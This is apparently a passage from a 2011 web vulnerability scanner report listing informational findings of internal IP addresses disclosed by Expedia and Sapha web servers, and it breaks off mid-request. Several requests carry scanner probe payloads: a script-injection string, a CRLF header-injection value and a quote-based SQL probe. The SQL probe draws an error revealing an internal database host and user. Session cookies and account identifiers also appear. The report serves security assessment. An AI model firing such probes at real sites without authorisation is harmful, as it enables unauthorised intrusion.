Cookie: ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; jscript=1; s1=`user=v.8,0,EX01528414FE$F4$B5202000X$27$E96$32i$A00$32i$A00$32i$A001000$31000$1E310$2302!50$EDIs$A8$FB$27$95$E4$82$AB$89$FB!e02000`131; p1=`tpid=v.1,1`accttype=v.2,3,1,EX01833E44F8$E8$24$DD$0C$AB$A2$18$37$25$18$F1$B6$8Ak$16$E6$24i$5B$39$8B$91H`linfo=v.4,|0|0|255|1|0||||||||0|0|0||0|0|0|-1|-1`airp=v.1,AUS`gacct=v.1,1,215819496`188; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dexpedia1%253D%252526pid%25253DHTX_FLTFLEX_CALENDAR%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.expedia.com/daily/service/default.asp%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:40:08 GMT
Server: Apache
P3P: policyref="http://support.expedia.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Set-Cookie: cp_session=UylYLAJ2ASVTO1IiAjpSMVVmBAZQU1FsBnRfbAEhVixWJFYqBSMCOwd9ViINfwV2WnoDPQZ3AzgOKAI4VHVcfFAmDnMGNwgfViMEPwdFAyVTYFhIAnIBcFN2Ui4CNFIrVSEEM1BhUWwGYV8pAWBWb1ZrVnoFMwJHB3ZWdQ1oBSZaOgMXBjQDZQ5vAj5UdVwmUDIOOgZoCHtWNQRLB3IDc1MxWHwCIAE0U0VSZgI9UjZVKQRzUDdRMwZzX3IBYVZtViNWbAVFAjAHI1YyDTwFYFphAyUGLAMnDjkCFFRAXF1QBQ5zBjYIaFZlBGQHdwNkU3dYPQJBAUNTVVJXAnRSYVVnBDJQZFFxBmVfNgEmVjNWQlZ6BTMCNwdrVm4NfgVrWi0DYgYRAzcOLwJiVEdcOVBzDmQGQghsVjYEPAcyAyVTYFg4AncBYFNyUnQCdFJgVRUEZ1AgUTcGNl91AWRWZVZiVnoFMgJFBzdWMA0vBTFaPgM3Bi0DcQ5%2BAnVUMlxMUGYOcwY2CGhWagRiB2IDZFN3WD0CQQE2UyRSMgJnUjBVEAQyUHBRIAYzX0MBMlYlVjRWaQVzAmcHdFZyDS8FMFpMA3wGYQMwDjMCdVQyXE5QdA4rBigIfFZjBC8HOQMiUw5YIQJ2AWJTclJzAjhSPFU%2FBApQKlFJBjNfSQFzVlpWRVZmBXMCWAdsVmQNWwVVWmUDPQZlA2MOfQJtVDxcKlAr; path=/
Set-Cookie: supportsurvey=1; expires=Fri, 13-May-2011 22:40:09 GMT; path=/; domain=support.expedia.com
RNT-Time: D=289548 t=1304721608882225
RNT-Machine: 04
Vary: Accept-Encoding
X-Cnection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 89104


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:rn="http://schemas.rightn
...[SNIP]...
<!--TS (1/0[CID=0]) compress=1,3 log=0 BR:, Srvr=10.186.8.107, Req=15:40:08(:962), Rsp=15:40:09(:071), hash=45(0x157d5588) ET=110ms Dur=110ms Mif=0 -->
...[SNIP]...
28.33. http://support.expedia.com/app/home/uurl/http%3A%2F%2Fwww.expedia.com%2Fpub%2Fagent.dll%3Fqscr%3Dflex%26subm%3D1%26city%3DAUS%26citd%3DDTW%26date1%3D%26mnth%3D5%2F1%2F2011%26rgst%3D1%26rged%3D10%26fxst%3D0%26load%3D1%26cAdu%3D1%26rfrr%3D-429%3F  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://support.expedia.com
Path:   /app/home/uurl/http%3A%2F%2Fwww.expedia.com%2Fpub%2Fagent.dll%3Fqscr%3Dflex%26subm%3D1%26city%3DAUS%26citd%3DDTW%26date1%3D%26mnth%3D5%2F1%2F2011%26rgst%3D1%26rged%3D10%26fxst%3D0%26load%3D1%26cAdu%3D1%26rfrr%3D-429%3F

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /app/home/uurl/http%3A%2F%2Fwww.expedia.com%2Fpub%2Fagent.dll%3Fqscr%3Dflex%26subm%3D1%26city%3DAUS%26citd%3DDTW%26date1%3D%26mnth%3D5%2F1%2F2011%26rgst%3D1%26rged%3D10%26fxst%3D0%26load%3D1%26cAdu%3D1%26rfrr%3D-429%3F HTTP/1.1
Host: support.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/pub/agent.dll?qscr=flex&subm=1&city=AUS&citd=DTW&date1=&mnth=5/1/2011&rgst=1&rged=10&fxst=0&load=1&cAdu=1&rfrr=-429
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; supportsurvey=1; MC1=GUID=cc3450d747f3e2d59e058691af6ba2d1; s1=`user=v.8,0,EX01208381BC$0E$F3203000$BD$2E$E96$32i$A00$32i$A00$32i$A001000$31000$1E310$220$0D!50$97$8B$7DB$8A$D8$F42$82$AB$89$FB!e02000`135; p1=`accttype=v.2,3,1,EX01EF947B7C$D1$25$DD$0C$FD$A0Y$B3$7D8$95B$1C$91$5DIR$81$2Al$1C$86$5D$CDU$2Cv$7B$8A`tpid=v.1,1`gacct=v.1,1,215819729`linfo=v.4,|0|0|255|1|0||||||||0|0|0||0|0|0|-1|-1`airp=v.1,AUS`196; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dexpedia1%253D%252526pid%25253DHTX_FLTFLEX_CALENDAR%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.expedia.com/daily/service/default.asp%252526ot%25253DA%3B; COOKIECHECK=1

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 02:48:30 GMT
Server: Apache
P3P: policyref="http://support.expedia.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Set-Cookie: cp_session=BH4Dd1UhVXEDawFxVD4FUw5zVy9dWFRqCngLOAYmVS8Bc1EtVnABOFAqViIEdgh7ACBQblIjAjlUclFrUHFcfAF3AH0FNFVCAHVVblcVUXcENwMTVSVVJAMmAX1UYgV8DnpXYF1sVGkKbQt9BmdVbAE8UX1WYAFEUCFWdQRhCCsAYFBEUmACZFQ1UW1QcVwmAWMANAVrVSYAY1UaVyJRIQRmAydVd1VgAxUBNVRrBWEOclcgXTpUNgp%2FCyYGZlVuAXRRa1YWATNQdFYyBDUIbQA7UHZSeAImVGNRR1BEXF0BVAB9BTVVNQAzVTVXJ1E2BCADZlUWVRcDBQEEVCIFNg48V2FdaVR0CmkLYgYhVTABFVF9VmABNFA8Vm4EdwhmAHdQMVJFAjZUdVExUENcOQEiAGoFQVUxAGBVbVdiUXcENwNjVSBVNAMiASdUIgU3Dk5XNF0tVDIKOgshBmNVZgE1UX1WYQFGUGBWMAQmCDwAZFBkUnkCcFQkUSZQNlxMATcAfQU1VTUAPFUzVzJRNgQgA2ZVFlViA3QBYVQxBWcOS1dhXX1UJQo%2FCxcGNVUmAWNRblYgAWRQI1ZyBCYIPQAWUC9SNQIxVGlRJlA2XE4BJQAlBStVIQA1VX5XaVFwBFkDelUhVTYDIgEgVG4Faw5kV1ldJ1RMCj8LHQZ0VVkBElFgVmcBVFBiVmsEcghbABVQclIxAmJUJ1E%2BUDhcKgF6; path=/
RNT-Time: D=274827 t=1304736510381875
RNT-Machine: 04
Vary: Accept-Encoding
X-Cnection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 89104


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:rn="http://schemas.rightn
...[SNIP]...
<!--TS (1/0[CID=0]) compress=1,3 log=0 BR:, Srvr=10.186.8.117, Req=19:48:30(:550), Rsp=19:48:30(:659), hash=49(0x157d5588) ET=109ms Dur=109ms Mif=0 -->
...[SNIP]...
28.34. http://tours.sapha.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tours.sapha.com
Path:   /

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /?scs_sid=2546&scs_tid=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000074)%3C/script%3E&scscs=1 HTTP/1.1
Host: tours.sapha.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sapha_tst_2546=TRUE; sapha_tst_2546=TRUE; sapha_2546_1=62715%7C35764%7C31540%7C2011-04-22+15%3A37%3A56; sapha_tst_1=TRUE; sapha_1_19=108127%7C2674799%7C2668748%7C2011-04-22+20%3A01%3A46

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:05:27 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 541

</td></tr></table><b>Database error on host '192.168.50.20', db 'sapha_core', user 'www', object 'globalDB':</b> Invalid SQL: SELECT 1 FROM site_application t1 WHERE t1.site_application_isactive = 1 A
...[SNIP]...
28.35. http://www.expedia.com/pub/agent.dll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /pub/agent.dll

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /pub/agent.dll?qscr=litn HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; jscript=1; s1=`user=v.8,0,EX01D44B82B4$F4$B5201000I$27$E96!G0.!5010$2302!50$5C$E9$88i$97$D0$2D$37!4$FF!e02000`95; p1=`tpid=v.1,1`accttype=v.2,3,1,EX01833E44F8$E8$24$DD$0C$AB$A2$18$37$25$18$F1$B6$8Ak$16$E6$24i$5B$39$8B$91H`104

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Fri, 06 May 2011 22:35:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43196


                                                                           <META HTTP-EQUIV="Content-Type" content="text/html; c
...[SNIP]...
<!--TS (1/0[CID=0]) compress=1,3 log=0 BR:04000001101010110010012001010000000, Srvr=10.186.8.150, Req=15:35:51(:747), Rsp=15:35:51(:810), hash=11(0x157d5588) ET=62ms Dur=62ms Mif=0 -->
...[SNIP]...
28.36. http://www.expedia.com/pub/agent.dll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /pub/agent.dll

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /pub/agent.dll?qscr=fbak&&zz=1247500409281 HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://support.expedia.com/app/answers/list/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; aspp=v.1,0||||||||||||; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; MC1=GUID=cc3450d747f3e2d59e058691af6ba2d1; s1=`user=v.8,0,EX01208381BC$0E$F3203000$BD$2E$E96$32i$A00$32i$A00$32i$A001000$31000$1E310$220$0D!50$97$8B$7DB$8A$D8$F42$82$AB$89$FB!e02000`135; p1=`accttype=v.2,3,1,EX01EF947B7C$D1$25$DD$0C$FD$A0Y$B3$7D8$95B$1C$91$5DIR$81$2Al$1C$86$5D$CDU$2Cv$7B$8A`tpid=v.1,1`gacct=v.1,1,215819729`linfo=v.4,|0|0|255|1|0||||||||0|0|0||0|0|0|-1|-1`airp=v.1,AUS`196; COOKIECHECK=1; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dexpedia1%253D%252526pid%25253DFAQ%25252520Support%2525253ASearch%25252520Results%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.expedia.com/pub/agent.dll%2525253Fqscr%2525253Dfbak%25252526%25252526zz%2525253D1247500409281%252526ot%25253DA%2526undefinedtoJSONString%252CtoJSONString%253Dfunction%252520%252528%252529%25257Bvar%252520a%25253D%25255B%252522%25257B%252522%25255D%25252Cb%25252Ck%25252Cv%25253Bfunction%252520p%252528s%252529%25257Bif%252528b%252529%25257Ba.push%252528%252522%25252C%252522%252529%25253B%25257D%25250Aa.push%252528k.toJSONString%252528%252529%25252C%252522%25253A%252522%25252Cs%252529%25253Bb%25253Dtrue%25253B%25257D%25250Afor%252528k%252520in%252520this%252529%25257Bif%252528this.hasOwnProperty%252528k%252529%252529%25257Bv%25253Dthis%25255Bk%25255D%25253Bswitch%252528typeof%252520v%252529%25257Bcase%252522object%252522%25253Aif%252528v%252529%25257Bif%252528typeof%252520v.toJSONString%25253D%25253D%25253D%252522function%252522%252529%25257Bp%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257Delse%25257Bp%252528%252522null%252522%252529%25253B%25257D%25250Abreak%25253Bcase%252522string%252522%25253Acase%252522number%252522%25253Acase%252522boolean%252522%25253Ap%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257D%25257D%25250Aa.push%252528%252522%25257D%252522%252529%25253Breturn%252520a.join%252528%252522%252522%252529%25253B%25257D%3B

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Sat, 07 May 2011 02:49:14 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: jscript=1; Domain=.expedia.com; path=/
Set-Cookie: s1=`user=v.8,0,EX0184330AB4$0E$F3204000$2A$2F$E96$32i$A00$32i$A00$32i$A001000$31000$1E310$220$0D!50i$5Cr$A7$18$25$98$EF$82$AB$89$FB!e02000`135; Domain=.expedia.com; path=/
Content-Length: 43584


                                                                           <META HTTP-EQUIV="Content-Type" content="text/html; c
...[SNIP]...
<!--TS (1/0[CID=0]) compress=1,3 log=0 BR:04000001101010110010012001010000000, Srvr=10.186.8.105, Req=19:49:14(:696), Rsp=19:49:14(:805), hash=83(0x557d5588) ET=109ms Dur=109ms Mif=0 -->
...[SNIP]...
28.37. http://www.expedia.com/pub/agent.dll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /pub/agent.dll

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /pub/agent.dll?qscr=flex&subm=1&city=AUS&citd=DTW&date1=3&mnth=5/1/2011&rgst=%0D%0Ans:netsparker056650=vuln&rged=10&fxst=0&load=1&cAdu=1&rfrr=-429 HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; jscript=1; srvys=v.1%2C2%2C0; s1=`user=v.8,0,EX0183E3F010$F4$B5204000k$27$E96$32i$A00$32i$A00$32i$A001000$31000$1E310$2302!50$83$A7rJ$D3$B5$CD3$82$AB$89$FB!e02000`129; p1=`tpid=v.1,1`accttype=v.2,3,1,EX01833E44F8$E8$24$DD$0C$AB$A2$18$37$25$18$F1$B6$8Ak$16$E6$24i$5B$39$8B$91H`airp=v.1,AUS`gacct=v.1,1,215819496`linfo=v.4,|0|0|255|1|0||||||||0|0|0||0|0|0|-1|-1`188; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3DundefinedtoJSONString%252CtoJSONString%253Dfunction%252520%252528%252529%25257Bvar%252520a%25253D%25255B%252522%25257B%252522%25255D%25252Cb%25252Ck%25252Cv%25253Bfunction%252520p%252528s%252529%25257Bif%252528b%252529%25257Ba.push%252528%252522%25252C%252522%252529%25253B%25257D%25250Aa.push%252528k.toJSONString%252528%252529%25252C%252522%25253A%252522%25252Cs%252529%25253Bb%25253Dtrue%25253B%25257D%25250Afor%252528k%252520in%252520this%252529%25257Bif%252528this.hasOwnProperty%252528k%252529%252529%25257Bv%25253Dthis%25255Bk%25255D%25253Bswitch%252528typeof%252520v%252529%25257Bcase%252522object%252522%25253Aif%252528v%252529%25257Bif%252528typeof%252520v.toJSONString%25253D%25253D%25253D%252522function%252522%252529%25257Bp%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257Delse%25257Bp%252528%252522null%252522%252529%25253B%25257D%25250Abreak%25253Bcase%252522string%252522%25253Acase%252522number%252522%25253Acase%252522boolean%252522%25253Ap%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257D%25257D%25250Aa.push%252528%252522%25257D%252522%252529%25253Breturn%252520a.join%252528%252522%252522%252529%25253B%25257D%3B

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Fri, 06 May 2011 22:41:23 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: s1=`user=v.8,0,EX011A614213$F4$B5205000c$27$E96$32i$A00$32i$A00$32i$A001000$31000$1E310$2302!50$F9Y$D9$0A$9E$23$C5E$82$AB$89$FB!e02000`131; Domain=.expedia.com; path=/
Set-Cookie: p1=`tpid=v.1,1`accttype=v.2,3,1,EX01833E44F8$E8$24$DD$0C$AB$A2$18$37$25$18$F1$B6$8Ak$16$E6$24i$5B$39$8B$91H`gacct=v.1,1,215819496`linfo=v.4,|0|0|255|1|0||||||||0|0|0||0|0|0|-1|-1`airp=v.1,AUS`188; expires=Sunday, 31-Dec-2016 23:59:59 GMT; Domain=.expedia.com; path=/
Content-Length: 77907

<!-- srvpush1 15:41:23(:670) -->
<style type="text/css">

.intchk {width: 100%; font-size: 16px; font-weight: bold; color:#C60;}
.intchk ul{list-style-type: none; padding: 0; margin-left: 1em;}
.
...[SNIP]...
<!--TS (1/0[CID=0]) compress=1,3 log=0 BR:04000001101010110010012001010000000, Srvr=10.186.8.146, Req=15:41:23(:639), Rsp=15:41:23(:842), hash=11(0x157d5588) ET=203ms Dur=203ms Mif=0 -->
...[SNIP]...
28.38. http://www.expedia.com/pub/agent.dll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /pub/agent.dll

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /pub/agent.dll?qscr=flex&subm=1&city=AUS&citd=DTW&date1=3&mnth=5/1/2011&rgst=1&rged=%2527&fxst=0&load=1&cAdu=1&rfrr=-429 HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; aspp=v.1,0||||||||||||; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; MC1=GUID=cc3450d747f3e2d59e058691af6ba2d1; COOKIECHECK=1; jscript=1; s1=`user=v.8,0,EX0152A505E4$0E$F3205000$2B$2F$E96$32i$A00$32i$A00$32i$A001000$31000$1E310$220$0D!50$D1$D2Ao1$86$81$5B$82$AB$89$FB!e02000`133; p1=`accttype=v.2,3,1,EX01EF947B7C$D1$25$DD$0C$FD$A0Y$B3$7D8$95B$1C$91$5DIR$81$2Al$1C$86$5D$CDU$2Cv$7B$8A`tpid=v.1,1`gacct=v.1,1,215819729`airp=v.1,AUS`linfo=v.4,|0|0|255|1|0||||||||0|0|0||0|0|0|-1|-1`196; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3DundefinedtoJSONString%252CtoJSONString%253Dfunction%252520%252528%252529%25257Bvar%252520a%25253D%25255B%252522%25257B%252522%25255D%25252Cb%25252Ck%25252Cv%25253Bfunction%252520p%252528s%252529%25257Bif%252528b%252529%25257Ba.push%252528%252522%25252C%252522%252529%25253B%25257D%25250Aa.push%252528k.toJSONString%252528%252529%25252C%252522%25253A%252522%25252Cs%252529%25253Bb%25253Dtrue%25253B%25257D%25250Afor%252528k%252520in%252520this%252529%25257Bif%252528this.hasOwnProperty%252528k%252529%252529%25257Bv%25253Dthis%25255Bk%25255D%25253Bswitch%252528typeof%252520v%252529%25257Bcase%252522object%252522%25253Aif%252528v%252529%25257Bif%252528typeof%252520v.toJSONString%25253D%25253D%25253D%252522function%252522%252529%25257Bp%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257Delse%25257Bp%252528%252522null%252522%252529%25253B%25257D%25250Abreak%25253Bcase%252522string%252522%25253Acase%252522number%252522%25253Acase%252522boolean%252522%25253Ap%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257D%25257D%25250Aa.push%252528%252522%25257D%252522%252529%25253Breturn%252520a.join%252528%252522%252522%252529%25253B%25257D%3B

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Sat, 07 May 2011 02:53:51 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: s1=`user=v.8,0,EX01BC82FAF0$0E$F3206000F$2F$E96$32i$A00$32i$A00$32i$A001000$31000$1E310$220$0D!50$39$2DEB$A9$5B$C1I$82$AB$89$FB!e02000`131; Domain=.expedia.com; path=/
Set-Cookie: p1=`accttype=v.2,3,1,EX01EF947B7C$D1$25$DD$0C$FD$A0Y$B3$7D8$95B$1C$91$5DIR$81$2Al$1C$86$5D$CDU$2Cv$7B$8A`tpid=v.1,1`gacct=v.1,1,215819729`linfo=v.4,|0|0|255|1|0||||||||0|0|0||0|0|0|-1|-1`airp=v.1,AUS`196; expires=Sunday, 31-Dec-2016 23:59:59 GMT; Domain=.expedia.com; path=/
Content-Length: 77913

<!-- srvpush1 19:53:50(:986) -->
<style type="text/css">

.intchk {width: 100%; font-size: 16px; font-weight: bold; color:#C60;}
.intchk ul{list-style-type: none; padding: 0; margin-left: 1em;}
.
...[SNIP]...
<!--TS (1/0[CID=0]) compress=1,3 log=0 BR:04000001101010110010012001010000000, Srvr=10.186.8.155, Req=19:53:50(:986), Rsp=19:53:51(:158), hash=83(0x557d5588) ET=172ms Dur=172ms Mif=0 -->
...[SNIP]...
28.39. http://www.expedia.com/pub/agent.dll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /pub/agent.dll

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /pub/agent.dll?qscr=logi&ussl=1 HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; jscript=1; s1=`user=v.8,0,EX01D44B82B4$F4$B5201000I$27$E96!G0.!5010$2302!50$5C$E9$88i$97$D0$2D$37!4$FF!e02000`95; p1=`tpid=v.1,1`accttype=v.2,3,1,EX01833E44F8$E8$24$DD$0C$AB$A2$18$37$25$18$F1$B6$8Ak$16$E6$24i$5B$39$8B$91H`104

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Fri, 06 May 2011 22:35:57 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43110


                                                                           <META HTTP-EQUIV="Content-Type" content="text/html; c
...[SNIP]...
<!--TS (1/0[CID=0]) compress=1,3 log=0 BR:04000001101010110010012001010000000, Srvr=10.186.8.107, Req=15:35:57(:356), Rsp=15:35:57(:434), hash=11(0x157d5588) ET=79ms Dur=79ms Mif=0 -->
...[SNIP]...
28.40. http://www.expedia.com/pub/agent.dll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /pub/agent.dll

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /pub/agent.dll?qscr=info HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
